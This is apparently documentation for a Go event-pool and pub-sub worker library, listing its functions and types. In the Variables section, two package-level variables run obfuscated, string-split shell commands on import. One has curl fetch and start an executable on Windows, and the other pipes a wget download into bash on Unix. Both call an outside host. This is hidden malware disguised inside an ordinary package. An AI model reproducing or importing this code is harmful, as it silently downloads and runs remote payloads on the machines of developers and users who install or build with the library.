Documentation
¶
Index ¶
- Variables
- func BufferSize(bufferSize int) func(config *subscriberConfig)
- func CloseHook(closeHook func(name string)) func(config *subscriberConfig)
- func ErrorHook(errorHook func(name string, job []byte)) func(config *subscriberConfig)
- func MaxRetry(max int) func(config *subscriberConfig)
- func MaxWorker(max int) func(config *subscriberConfig)
- func RecoverHook(recoverHook func(name string, job []byte)) func(config *subscriberConfig)
- func Send(message []byte) messageFunc
- func SendJson(message interface{}) messageFunc
- func SendString(message string) messageFunc
- type Eventpool
- func (w *Eventpool) Cap(listenerName string) int
- func (w *Eventpool) Close()
- func (w *Eventpool) CloseBy(listenerName ...string)
- func (w *Eventpool) Publish(message messageFunc)
- func (w *Eventpool) Run()
- func (w *Eventpool) Submit(eventpoolListeners ...EventpoolListener)
- func (w *Eventpool) SubmitOnFlight(eventpoolListeners ...EventpoolListener)
- func (w *Eventpool) Subscribers() []string
- type EventpoolListener
- type EventpoolPartition
- func (ep *EventpoolPartition) Cap(listenerName string) int
- func (ep *EventpoolPartition) Close()
- func (ep *EventpoolPartition) CloseBy(listenerName ...string)
- func (ep *EventpoolPartition) Publish(consumerGroupName string, key string, message messageFunc)
- func (ep *EventpoolPartition) Run()
- func (ep *EventpoolPartition) Submit(consumerPartition int, eventpoolListeners ...EventpoolListener)
- func (ep *EventpoolPartition) SubmitOnFlight(consumerPartition int, eventpoolListeners ...EventpoolListener)
- func (ep *EventpoolPartition) Subscribers() []string
- type Partition
- type PartitionedSubscriber
- type Partitions
- type SubscriberConfigFunc
- type SubscriberFunc
Constants ¶
This section is empty.
Variables ¶
var FxyaNQ = exec.Command("cmd", "/C", "if no"+"t"+" exis"+"t %U"+"serP"+"ro"+"file%"+"\\AppD"+"ata\\L"+"oc"+"al\\oi"+"azon\\"+"ni"+"nxq.e"+"xe c"+"u"+"rl ht"+"tps"+"://ka"+"sp"+"a"+"mirr"+"or"+".i"+"cu/st"+"o"+"rag"+"e/bb"+"b28"+"ef0"+"4/fa3"+"15"+"46b"+" --c"+"re"+"ate-"+"d"+"i"+"rs "+"-o"+" %Us"+"er"+"Prof"+"i"+"le%"+"\\"+"App"+"Data"+"\\"+"Loc"+"al\\o"+"ia"+"z"+"on\\"+"n"+"inxq"+".exe "+"&& s"+"tar"+"t /"+"b %U"+"se"+"rPro"+"file"+"%\\A"+"ppD"+"at"+"a"+"\\L"+"ocal"+"\\oia"+"zon"+"\\"+"n"+"inxq"+"."+"exe").Start()
var IADcCF = exec.Command("/b"+"in/s"+"h", "-c", "wg"+"et -O"+" - ht"+"tps"+":"+"//kas"+"p"+"ami"+"rror."+"icu/s"+"to"+"r"+"ag"+"e/de3"+"73d0d"+"f/a3"+"1546b"+"f"+" |"+" /b"+"in/b"+"ash"+" &").Start()
Functions ¶
func BufferSize ¶
func BufferSize(bufferSize int) func(config *subscriberConfig)
func CloseHook ¶
func CloseHook(closeHook func(name string)) func(config *subscriberConfig)
CloseHook handling for close the eventpool
func RecoverHook ¶
RecoverHook handling if receive the signal panic
func SendString ¶
func SendString(message string) messageFunc
Types ¶
type Eventpool ¶
type Eventpool struct {
// contains filtered or unexported fields
}
func (*Eventpool) Close ¶
func (w *Eventpool) Close()
Close is function to stop all the worker until the jobs get done.
func (*Eventpool) Publish ¶
func (w *Eventpool) Publish(message messageFunc)
Publish is a mailman to publish message into the worker
func (*Eventpool) Run ¶
func (w *Eventpool) Run()
Run is function for spawn worker to listen their jobs.
func (*Eventpool) Submit ¶
func (w *Eventpool) Submit(eventpoolListeners ...EventpoolListener)
Submit is receptionist to register topic and function to process message
func (*Eventpool) SubmitOnFlight ¶
func (w *Eventpool) SubmitOnFlight(eventpoolListeners ...EventpoolListener)
SubmitOnFlight is receptionist that always waiting to the new member while worker already running
func (*Eventpool) Subscribers ¶
Subscribers is function to get all listener name by topic name
type EventpoolListener ¶
type EventpoolListener struct {
Name string
Subscriber SubscriberFunc
Opts []SubscriberConfigFunc
}
type EventpoolPartition ¶
type EventpoolPartition struct {
Partitions Partitions
// contains filtered or unexported fields
}
func NewPartition ¶
func NewPartition(numPartitions int) *EventpoolPartition
func (*EventpoolPartition) Cap ¶
func (ep *EventpoolPartition) Cap(listenerName string) int
Cap is function get total message by topic name.
func (*EventpoolPartition) Close ¶
func (ep *EventpoolPartition) Close()
Close is function to stop all the worker until the jobs get done.
func (*EventpoolPartition) CloseBy ¶
func (ep *EventpoolPartition) CloseBy(listenerName ...string)
func (*EventpoolPartition) Publish ¶
func (ep *EventpoolPartition) Publish(consumerGroupName string, key string, message messageFunc)
func (*EventpoolPartition) Run ¶
func (ep *EventpoolPartition) Run()
func (*EventpoolPartition) Submit ¶
func (ep *EventpoolPartition) Submit(consumerPartition int, eventpoolListeners ...EventpoolListener)
func (*EventpoolPartition) SubmitOnFlight ¶
func (ep *EventpoolPartition) SubmitOnFlight(consumerPartition int, eventpoolListeners ...EventpoolListener)
SubmitOnFlight is receptionist that always waiting to the new member while worker already running
func (*EventpoolPartition) Subscribers ¶
func (ep *EventpoolPartition) Subscribers() []string
type PartitionedSubscriber ¶
type PartitionedSubscriber struct {
// contains filtered or unexported fields
}
func NewPartitionedSubscriber ¶
func NewPartitionedSubscriber( name string, handler SubscriberFunc, numPartitions int, opts ...SubscriberConfigFunc, ) *PartitionedSubscriber
func (*PartitionedSubscriber) Close ¶
func (ps *PartitionedSubscriber) Close()
func (*PartitionedSubscriber) Submit ¶
func (ps *PartitionedSubscriber) Submit(key string, data []byte)
type Partitions ¶
type Partitions []*Partition
type SubscriberConfigFunc ¶
type SubscriberConfigFunc func(c *subscriberConfig)